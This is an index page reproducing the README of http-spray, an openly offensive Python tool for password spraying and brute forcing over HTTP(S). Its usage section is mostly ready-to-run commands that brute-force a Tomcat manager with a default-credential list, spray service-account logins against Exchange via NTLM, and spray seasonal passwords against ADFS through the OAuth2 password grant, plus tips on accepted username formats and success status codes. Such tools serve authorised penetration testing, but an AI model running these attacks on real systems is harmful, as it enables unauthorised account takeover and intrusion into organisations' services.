Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/dadevel/http-spray

Password Spraying and Brute Forcing over HTTP(S)
https://github.com/dadevel/http-spray

brute-force http password-spraying

Last synced: 3 days ago
JSON representation

Password Spraying and Brute Forcing over HTTP(S)

Host: GitHub
URL: https://github.com/dadevel/http-spray
Owner: dadevel
License: mit
Created: 2024-06-26T09:42:33.000Z (5 months ago)
Default Branch: main
Last Pushed: 2024-07-07T10:58:14.000Z (5 months ago)
Last Synced: 2024-07-07T12:02:13.641Z (5 months ago)
Topics: brute-force, http, password-spraying
Language: Python
Homepage:
Size: 15.6 KB
Stars: 0
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

        # http-spray

## Setup

Install with [pipx](https://github.com/pypa/pipx/).

~~~ bash

pipx install git+https://github.com/dadevel/http-spray.git

~~~

## Usage

Brute force Tomcat manager.

~~~ bash

curl -LO https://github.com/dadevel/wordlists/raw/main/passwords/tomcat-credentials.txt

http-spray -t https://app.corp.com/tomcat/manager/html -m basic -C ./tomcat-credentials.txt | tee -a ./log.json | jq -c 'select(.status_code != 401)'

~~~

Spray common service accounts against on-prem Exchange server.

~~~ bash

http-spray -t https://mail.corp.com/rpc/ -m ntlm -c scanner:scanner -c printer:printer | tee -a ./log.json | jq -c 'select(.status_code != 401)'

~~~

> **Note:**

> The RPC endpoint returns 404 for successful logins.

> For alternate endpoints see [here](https://github.com/dadevel/wordlists/raw/main/windows/exchange.txt).

>

> Furthermore Exchange accepts the following username formats: `jdoe`, `corp\jdoe`, `corp.com\jdoe`, `[email protected]` where `jdoe` is the *samaccountname*.

> Depending on the environment the *mail* attribute, e.g. `[email protected]`, might work for the OWA web login.

Spray weak passwords against ADFS trough OAuth2 password grant.

~~~ bash

http-spray -t https://sts.corp.com/adfs/oauth2/token/ -m oauth --client-id 11111111-2222-3333-4444-555555555555 --resource https://app.corp.com/ -U ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./log.json | jq -c 'select(.status_code == 200)'

~~~

> **Note:**

> ADFS accepts the following username formats: `corp\jdoe`, `corp.com\jdoe` and `[email protected]`.

> Depending on the environment the *mail* attribute, e.g. `[email protected]`, might work as well.